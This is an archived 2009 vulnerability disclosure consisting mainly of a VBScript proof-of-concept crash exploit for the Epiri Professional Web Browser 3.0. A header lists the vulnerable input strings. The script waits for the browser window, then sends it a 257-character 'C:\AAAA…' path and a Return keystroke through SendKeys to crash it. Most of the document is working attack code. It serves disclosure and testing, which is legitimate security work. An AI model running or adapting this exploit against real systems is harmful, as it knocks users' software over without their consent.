' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Note: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009


' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

    ' Loop until the browser window titled "Epiri Professional 3.0" has focus
    Do Until Success = True

        Success = crash.AppActivate("Epiri Professional 3.0")

    Loop

    '.SendKeys "file://"
    '.SendKeys "C::"
    ' Long path typed into the focused window (string split across lines for readability)
    .SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

    .SendKeys "~" 'Return

End With

Wscript.Quit

# milw0rm.com [2009-07-30]